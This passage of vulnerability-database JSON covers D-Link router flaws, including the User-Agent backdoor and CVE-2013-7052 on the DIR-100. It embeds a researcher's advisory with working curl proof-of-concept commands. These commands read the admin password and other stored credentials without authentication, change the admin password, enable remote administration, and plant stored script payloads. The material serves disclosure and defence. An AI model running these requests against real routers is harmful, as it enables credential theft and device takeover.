DIR-120\nD-Link DI-624S\nD-Link DI-524UP\nD-Link DI-604S\nD-Link DI-604UP\nD-Link DI-604\nD-Link DIR-100\nD-Link TM-G5240\nPLANEX COMMUNICATIONS BRL-04UR\nPLANEX COMMUNICATIONS BRL-04R\nPLANEX COMMUNICATIONS BRL-04CW. The vulnerability is caused by the script\u0027s lack of sufficient filtering of the parameters submitted by the user",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6027"
},
{
"db": "CERT/CC",
"id": "VU#248083"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004824"
},
{
"db": "CNVD",
"id": "CNVD-2013-13957"
},
{
"db": "BID",
"id": "63234"
},
{
"db": "VULHUB",
"id": "VHN-66029"
}
],
"trust": 3.24
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-66029",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-66029"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#248083",
"trust": 3.9
},
{
"db": "NVD",
"id": "CVE-2013-6027",
"trust": 3.4
},
{
"db": "BID",
"id": "63234",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004824",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201310-478",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2013-13957",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "38810",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-66029",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#248083"
},
{
"db": "CNVD",
"id": "CNVD-2013-13957"
},
{
"db": "VULHUB",
"id": "VHN-66029"
},
{
"db": "BID",
"id": "63234"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004824"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-478"
},
{
"db": "NVD",
"id": "CVE-2013-6027"
}
]
},
"id": "VAR-201310-0389",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13957"
},
{
"db": "VULHUB",
"id": "VHN-66029"
}
],
"trust": 1.4607143
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13957"
}
]
},
"last_update_date": "2024-11-23T22:18:43.935000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dlink.com/"
},
{
"title": "D-Link DIR-100 router \u2018RuntimeDiagnosticPing\u2019 Fixing measures for stack-based buffer error vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=234983"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004824"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-478"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-66029"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004824"
},
{
"db": "NVD",
"id": "CVE-2013-6027"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://www.kb.cert.org/vuls/id/248083"
},
{
"trust": 2.3,
"url": "http://pastebin.com/raw.php?i=vbig42vd"
},
{
"trust": 0.8,
"url": "http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/"
},
{
"trust": 0.8,
"url": "http://www.theregister.co.uk/2013/10/13/dlink_routers_have_admin_backdoor/"
},
{
"trust": 0.8,
"url": "http://www.dlink.com/uk/en/support/security "
},
{
"trust": 0.8,
"url": "http://blog.erratasec.com/2013/10/that-dlink-bug-masscan.html"
},
{
"trust": 0.8,
"url": "http://pastebin.com/vbig42vd"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6027"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6027"
},
{
"trust": 0.3,
"url": "http://www.dlink.com/"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#248083"
},
{
"db": "CNVD",
"id": "CNVD-2013-13957"
},
{
"db": "VULHUB",
"id": "VHN-66029"
},
{
"db": "BID",
"id": "63234"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004824"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-478"
},
{
"db": "NVD",
"id": "CVE-2013-6027"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#248083"
},
{
"db": "CNVD",
"id": "CNVD-2013-13957"
},
{
"db": "VULHUB",
"id": "VHN-66029"
},
{
"db": "BID",
"id": "63234"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004824"
},
{
"db": "CNNVD",
"id": "CNNVD-201310-478"
},
{
"db": "NVD",
"id": "CVE-2013-6027"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-10-17T00:00:00",
"db": "CERT/CC",
"id": "VU#248083"
},
{
"date": "2013-10-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-13957"
},
{
"date": "2013-10-19T00:00:00",
"db": "VULHUB",
"id": "VHN-66029"
},
{
"date": "2013-10-14T00:00:00",
"db": "BID",
"id": "63234"
},
{
"date": "2013-10-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-004824"
},
{
"date": "2013-10-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201310-478"
},
{
"date": "2013-10-19T10:36:09.180000",
"db": "NVD",
"id": "CVE-2013-6027"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-07-29T00:00:00",
"db": "CERT/CC",
"id": "VU#248083"
},
{
"date": "2013-10-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-13957"
},
{
"date": "2013-10-21T00:00:00",
"db": "VULHUB",
"id": "VHN-66029"
},
{
"date": "2013-12-10T00:56:00",
"db": "BID",
"id": "63234"
},
{
"date": "2013-10-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-004824"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201310-478"
},
{
"date": "2024-11-21T01:58:38.873000",
"db": "NVD",
"id": "CVE-2013-6027"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201310-478"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link routers authenticate administrative access using specific User-Agent string",
"sources": [
{
"db": "CERT/CC",
"id": "VU#248083"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201310-478"
}
],
"trust": 0.6
}
}
var-202002-0667
Vulnerability from variot
D-Link DIR-100 4.03B07: security bypass via an error in the cliget.cgi script. D-Link DIR-100 Contains a vulnerability related to insufficient protection of credentials.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. When a user logs in to the D-Link DIR-100 Ethernet Broadband Router management interface, the access to the cliget.cgi is not correctly restricted. The submitted request is only checked whether the IP addresses are the same, and the attacker is not authorized to access. For example, the management password information is obtained. D-Link DIR-100 is prone to the following security vulnerabilities: 1. An authentication-bypass vulnerability 2. Multiple information-disclosure vulnerabilities 3. A cross-site request-forgery vulnerability 4. A cross-site scripting vulnerability An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities * Date: 2013-12-18 * Author: Felix Richter * Contact: root@euer.krebsco.de * Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip * Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip * Report Version: 2.0 * Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt * Vulnerable: D-Link DIR-100 * Hardware Revision: D1 * Software Version: 4.03B07 (from 2012-04-10) * CVE Numbers: * CWE-287 Authentication Issues: CVE-2013-7051 * CWE-255 Issues with Credential Management: CVE-2013-7052 * CWE-352 Cross-Site Request Forgery: CVE-2013-7053 * CWE-79 Cross-Site Scripting: CVE-2013-7054 * CWE-200 Information Disclosure: CVE-2013-7055 * Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1 * State: Patched by Vendor * Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8
Table of Contents
1. Background
2. Technical Description
4. Severity and Remediation
5. Timeline
1. Background
The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications.
2 Vulnerability Description
Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker:
- Retrieve the Administrator password without authentication leading to authentication bypass [CWE-255]
- Retrieve sensitive configuration paramters like the pppoe username and password without authentication [CWE-200]
- Execute privileged Commands without authentication through a race condition leading to weak authentication enforcement [CWE-287]
- Sending formatted request to a victim which then will execute arbitrary commands on the device (CSRF) [CWE-352]
- Store arbitrary javascript code which will be executed when a victim accesses the administrator interface [CWE-79]
CVE-Numbers for these vulnerabilities has not yet been assigned.
3 Technical Description of the Vulnerabilities
3.0 The DIR-100 Web Interface and CGI
The DIR-100 Web interface provides a cgi-script on /cliget.cgi for
unauthenticated users and /cli.cgi for authenticated requests.
list of features provided by each cgi-script can be retrieved by:
curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'
3.1 Authentication Bypass
Description
The administrator password is not protected in any way on the device, every attacker with access to the administrator interface which listens on port 80. For retrieving the Administrator password the request must not be authenticated.
Proof of Concept
The web interface provides two distinct ways to retrieve the adminstrator password:
curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'
3.2 Weak Authentication
Description
As soon as a user is logged into the administration interface, the cli CGI
is unlocked and can be used by without authenticating before as
the cgi-script does not check any other authentication parameters such as
cookies or HTTP Parameters. The only access check is if the IP-Address is
the same.
Proof of Concept
# open the router interface in a web browser and log in
firefox 'http://192.168.0.1/'
# open a new terminal or another web-browser which is currently not logged
# in and try to access
curl 'http://192.168.0.1/cli.cgi?cmd=help'
# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login
3.3 Retrieve sensitive information
Description
Besides retrieving the administrator password without authentication it is possible to retrieve other sensitive configuration from the device as well like the PPTP and poe Username and Password, as well as the configured dyndns username and password and configured mail log credentials when these parameters are configured. No authentication is requred.
Proof of Concept
curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'
3.4 Cross-Site Request Forgery (CSRF)
Description
CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. As an example the attacker could change the administrator password (see Proof of Concept code) and enable system remote access.
Proof of Concept
Changing the password for administrator can be done when the ip-address is authenticated:
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# Change password
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
# enable remote console
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'
3.5 Cross-Site Scripting (XSS)
Description
It is possible for an authenticated user to store information on the server which will not be checked on the server side for special characters which results in persistent Cross-Site Scripting Vulnerabilities. With this vulnerabilty the victim (administrator) will run javascript code in the context of the D-Link DIR-100.
XSS is possible because only on the client side (javascript code) the input is filtered and validated, sending data directly to the CGI scripts.
Proof of Concept
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# XSS in Static IP Address Tab
curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
# XSS in Scheduler tab
curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'
4 Severity and Remediation
This exploits are considered very critical, especially when the feature of remote
administration is activated on the system.
Weak authentication, together with cross-site request forgery and authentication
bypass can result in a full device compromise from an arbitrary website the victim is
accessing, even if the device has remote administration deactivated on the
internet-port. It is recommended to upgrade the router with the newest firmware
of the D-Link DIR-100.
5 Timeline
2013-09-13 - First Contact with D-Link Support 2013-09-19 - Sent Report 2013-10-14 - Request Status update, Response: Beta will be available mid October 2013-12-02 - Vendor publishes Firmware Update 2013-12-11 - Request CVE-IDs 2013-12-18 - Publish the report
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202002-0667",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-100",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.03b07"
},
{
"model": "dir-100",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-100",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dir-100 firmware 4.03b07"
},
{
"model": "dir-100 ethernet broadband router 4.03b07",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-100 4.03b07",
"scope": null,
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dir-100 4.03b13",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01476"
},
{
"db": "BID",
"id": "65290"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007146"
},
{
"db": "NVD",
"id": "CVE-2013-7052"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Felix Richter",
"sources": [
{
"db": "BID",
"id": "65290"
},
{
"db": "PACKETSTORM",
"id": "125041"
}
],
"trust": 0.4
},
"cve": "CVE-2013-7052",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2013-7052",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-01476",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2013-7052",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2013-7052",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-7052",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2013-7052",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2014-01476",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202002-037",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01476"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007146"
},
{
"db": "CNNVD",
"id": "CNNVD-202002-037"
},
{
"db": "NVD",
"id": "CVE-2013-7052"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-100 4.03B07: security bypass via an error in the cliget.cgi script. D-Link DIR-100 Contains a vulnerability related to insufficient protection of credentials.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. When a user logs in to the D-Link DIR-100 Ethernet Broadband Router management interface, the access to the cliget.cgi is not correctly restricted. The submitted request is only checked whether the IP addresses are the same, and the attacker is not authorized to access. For example, the management password information is obtained. D-Link DIR-100 is prone to the following security vulnerabilities:\n1. An authentication-bypass vulnerability\n2. Multiple information-disclosure vulnerabilities\n3. A cross-site request-forgery vulnerability\n4. A cross-site scripting vulnerability\nAn attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities\n* Date: 2013-12-18\n* Author: Felix Richter\n* Contact: root@euer.krebsco.de\n* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip\n* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip\n* Report Version: 2.0\n* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt\n* Vulnerable: D-Link DIR-100\n * Hardware Revision: D1\n * Software Version: 4.03B07 (from 2012-04-10)\n* CVE Numbers: \n * CWE-287 Authentication Issues: CVE-2013-7051\n * CWE-255 Issues with Credential Management: CVE-2013-7052\n * CWE-352 Cross-Site Request Forgery: CVE-2013-7053\n * CWE-79 Cross-Site Scripting: CVE-2013-7054\n * CWE-200 Information Disclosure: CVE-2013-7055\n* Google Dork: \"D-Link Systems\" inurl:bsc_internet.htm D1\n* State: Patched by Vendor\n* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8\n\n# Table of Contents\n\n 1. Background\n 2. Technical Description\n 4. Severity and Remediation\n 5. Timeline\n\n# 1. Background\n\nThe DIR-100 is designed for easy and robust connectivity among heterogeneous\nstandards-based network devices. Computers can communicate directly with this\nrouter for automatic opening and closing of UDP/TCP ports to take full\nadvantage of the security provided without sacrificing functionality of on-line\napplications. \n\n# 2 Vulnerability Description\n\nMultiple vulnerabilities have been found in the D-Link DIR-100 Ethernet\nBroadband Router Revision D (and potentially other devices sharing the \naffected firmware) that could allow a remote attacker:\n\n - Retrieve the Administrator password without authentication leading to\n authentication bypass [CWE-255]\n - Retrieve sensitive configuration paramters like the pppoe username and\n password without authentication [CWE-200]\n - Execute privileged Commands without authentication through a race\n condition leading to weak authentication enforcement [CWE-287]\n - Sending formatted request to a victim which then will execute arbitrary\n commands on the device (CSRF) [CWE-352]\n - Store arbitrary javascript code which will be executed when a victim\n accesses the administrator interface [CWE-79]\n\nCVE-Numbers for these vulnerabilities has not yet been assigned. \n\n# 3 Technical Description of the Vulnerabilities\n\n## 3.0 The DIR-100 Web Interface and CGI\n\nThe DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for\nunauthenticated users and `/cli.cgi` for authenticated requests. \n\nlist of features provided by each cgi-script can be retrieved by:\n\n curl \u0027http://192.168.1.104/cliget.cgi?cmd=help\u0027\n # and respectively when authenticated\n curl \u0027http://192.168.1.104/cli.cgi?cmd=help\u0027\n\n## 3.1 Authentication Bypass\n\n### Description\n\nThe administrator password is not protected in any way on the device, every\nattacker with access to the administrator interface which listens on port 80. \nFor retrieving the Administrator password the request must not be\nauthenticated. \n\n\n### Proof of Concept\n\nThe web interface provides two distinct ways to retrieve the adminstrator\npassword:\n\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$sys_user1\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary\u0027\n\n## 3.2 Weak Authentication\n\n### Description\n\nAs soon as a user is logged into the administration interface, the cli CGI\nis `unlocked` and can be used by without authenticating before as\nthe cgi-script does not check any other authentication parameters such as\ncookies or HTTP Parameters. The only access check is if the IP-Address is \nthe same. \n\n### Proof of Concept\n \n # open the router interface in a web browser and log in\n firefox \u0027http://192.168.0.1/\u0027 \n \n # open a new terminal or another web-browser which is currently not logged\n # in and try to access\n\n curl \u0027http://192.168.0.1/cli.cgi?cmd=help\u0027\n\n # this request will be authenticated and it will not be redirected to the\n # login page. If no user is logged in, the request will be redirected to\n # the login \n\n## 3.3 Retrieve sensitive information\n\n### Description\n\nBesides retrieving the administrator password without authentication it is\npossible to retrieve other sensitive configuration from the device as well like\nthe PPTP and poe Username and Password, as well as the configured dyndns\nusername and password and configured mail log credentials when these parameters\nare configured. \nNo authentication is requred. \n\n### Proof of Concept\n\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$ddns1\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_user\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$poe_pass\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_user\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$pptp_pass\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_user\u0027\n curl \u0027http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd\u0027\n\n## 3.4 Cross-Site Request Forgery (CSRF)\n\n### Description\n\nCSRF attacks can be launched by sending a formatted request to a victim, then\ntricking the victim into loading the request (often automatically), which\nmakes it appear that the request came from the victim. As an example the\nattacker could change the administrator password (see Proof of Concept code)\nand enable system remote access. \n\n### Proof of Concept\n\nChanging the password for administrator can be done when the ip-address is\nauthenticated:\n\n # Log into DIR-100\n curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n # Change password\n curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin\u0026pass=c%;$sys_passHash=4%25;commit\u0027\n\n # enable remote console\n curl \u0027http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit\u0027\n\n## 3.5 Cross-Site Scripting (XSS)\n\n### Description\n\nIt is possible for an authenticated user to store information on the server\nwhich will not be checked on the server side for special characters which\nresults in persistent Cross-Site Scripting Vulnerabilities. With this\nvulnerabilty the victim (administrator) will run javascript code in the \ncontext of the D-Link DIR-100. \n\nXSS is possible because only on the client side (javascript code) the input is\nfiltered and validated, sending data directly to the CGI scripts. \n\n### Proof of Concept\n\n # Log into DIR-100\n curl -X POST -d \u0027uname=admin\u0026pws=password\u0026login=Login\u0027 \u0027http://192.168.0.1/login.htm\u0027\n\n # XSS in Static IP Address Tab\n curl \u0027http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=\u003cscript\u003ealert(1)\u003c/script\u003e%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=\u0027\n\n # XSS in Scheduler tab\n curl \u0027http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=\u003cscript\u003ealert(1)\u003c/script\u003e%26use=0%26idx=2%26;commit\u0027\n\n# 4 Severity and Remediation\n\nThis exploits are considered very critical, especially when the feature of remote\nadministration is activated on the system. \nWeak authentication, together with cross-site request forgery and authentication \nbypass can result in a full device compromise from an arbitrary website the victim is\naccessing, even if the device has remote administration 